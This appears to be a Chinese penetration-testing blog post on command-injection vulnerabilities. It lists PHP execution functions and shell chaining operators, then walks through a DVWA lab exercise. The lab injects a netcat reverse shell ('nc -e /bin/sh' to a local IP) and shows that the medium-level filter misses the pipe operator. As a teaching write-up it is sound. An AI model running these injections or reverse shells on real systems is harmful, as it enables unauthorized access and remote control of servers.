渗透测试之命令执行
一、命令执行介绍
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。
二、命令执行原理
由于代码过滤不严格导致用户提交的数据被解析执行而造成的漏洞。
三、命令执行类型
1.系统命令执行漏洞:传入系统命令
2.PHP代码执行漏洞:传入PHP代码
四、命令执行函数
1.常用系统命令执行函数:
system("")
exec("")
passthru("")
``反引号与shell_exec()
popen()
proc_open()
$env
2.常用PHP代码执行函数:
eval() assert() preg_repace()
3.防御命令执行函数
escapeshellarg() escapeshellcmd()
4.系统命令执行漏洞拼接符
| 只执行第二个命令
|| 先执行第一个命令若成功则继续执行第二个命令
& 不管第二个命令是否执行成功都会执行第二个命令
&& 必须两个命令都成功才执行
; 类似&
=========================================================================
四、命令执行实验
打开DVWA,设置security level:low
正常用户操作应该如下:
但是,由于开发的时候代码过滤不严谨,造成了黑客可以通过非法输入执行未授权命令。如下:
通过命令拼接,我们可以执行OS命令,说明这里存在命令执行漏洞。
漏洞利用,我们可以注入一个反向连接的命令。
首先,使用netcat监听端口命令: nc -vv -l -p 8080
注入命令:nc -e /bin/sh 192.168.164.128 8080 地址为我们本机的地址
看一下监听结果:
成功连接,并且执行系统命令。
我们将security level设置为medium,然后发现它只是过滤了; && & ||这些命令拼接符,但并没有过滤 | 所以上面步骤仍然有效。
==================================================================================================
总结:
如何避免命令注入漏洞?
1)尽量不适用哪些比较危险的方法函数
2)执行命令之前一定要使用过滤且避免遗漏,可以设置白名单的方式。输入之前,严格分析。
posted on 2022-02-27 19:04 shacker_shen 阅读(679) 评论(0) 编辑 收藏 举报
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧